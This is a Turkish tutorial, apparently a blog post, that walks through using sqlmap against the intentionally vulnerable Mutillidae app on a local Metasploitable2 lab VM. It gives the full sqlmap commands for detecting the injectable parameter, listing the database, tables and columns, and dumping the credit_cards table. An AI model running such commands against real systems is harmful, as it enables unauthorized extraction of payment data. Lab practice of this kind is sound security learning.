SQLMAP Aracı ile Mutillidae Platformundan SQL Açığı Tarama

Metasploitable2 İşletim Sisteminden SQLMAP Araçı ile Veri Tabanına Ulaşmak 

Bu yazımda,SQLMAP aracını kullanarak sanal makine olarak kurduğum Metasploitable2 işletim sistemi içerisinde olan Mutillidae platformunda SQL açıklarını,veri tabanı açıklarını tarayıp sızma işlemleri gerçekleştirdim.Keyifli okumalar dilerim :)

Öncellikle Mutillidae nedir onu ele alalım,

Mutillidae: Adrian “Irongeek” Crenshaw ve Jeremy “webpwnized” Druin tarafından geliştirilen web uygulamaları penetrasyon testleri ve hackleme amaçlı ücretsiz kaynak kodlu yazılımıdır.Clickjacking, SQLi, Xss, HTML Injection, Javascript Injection saldırıları gibi gibi pratikler yapabileceğiniz savunmasız bir ortam tasarlanmıştır.

Görüldüğü üzere yanlış giriş yaptık ve hatamızı aldık. Bu alanda açık varmı onu denemek için url kopyalıyalım.

Kopyaladığım Url’yi SQLMAP sorgusundan geçiyorum ve taramayı bekliyoruz.

SQLMAP bize username açığını bulduğunu söylüyor devam edeyim mi diye sorduğundan hayır diyip bu açıktan sızmayı deniyeceğiz.

Resimdeki kodu kullanarak veritabanlarının isimlerini öğrenebiliriz.

Tek tek SQL kodları ile veritabanlarının isimlerini öğrenmek yerine SQLMAP aracı bize veritabanlarının isimlerini otomatik hiç bir sql kodu yazmadan verebildiğini öğrendim.

Terminale 

sqlmap -u "http://192.168.148.132/mutillidae/index.php?page=user-info.php&username=mazlum&password=123456&user-info-php-submit-button=View+Account+Details" –current-db 

kodunu yazıp güncel veri tabanın ismini öğrenebiliriz.

Kodun cıktısı olarak veritabanın son güncel isminin owasp10 olduğunu öğrendik.
Bu kodu terminale yazarkta da owaps10 deki tüm tabloları bulabiliriz.

sqlmap –u "http://192.168.148.132/mutillidae/index.php?page=user-info.php&username=mazlum&password=123456&user-info-php-submit-button=View+Account+Details" --tables -D owasp10

owaps10 veritabanın da toplam 6 tablo olduğu sonucuna ulastık.

Bir diğer kod ise kredi kartı tablosundaki tüm sütünları çekmeye yarar.

sqlmap -u "http://192.168.148.132/mutillidae/index.php?page=user-info.php&username=mazlum&password=123456&user-info-php-submit-button=View+Account+Details" --columns -T credit_cards -D owasp10

Toplamda 4 sütün buldu şimdi bu sütundaki tüm bilgileri çekmek için,

sqlmap -u "http://192.168.148.132/mutillidae/index.php?page=user-info.php&username=mazlum&password=123456&user-info-php-submit-button=View+Account+Details" -T credit_cards -D owasp10 –dump

bu kodu kullanıyoruz.

Görüldüğü üzere tablo adı:credit_cart olan sütünları ccid,ccv,ccnumber,expiration sütünlarındaki tüm bilgileri otomatik olarak çektik.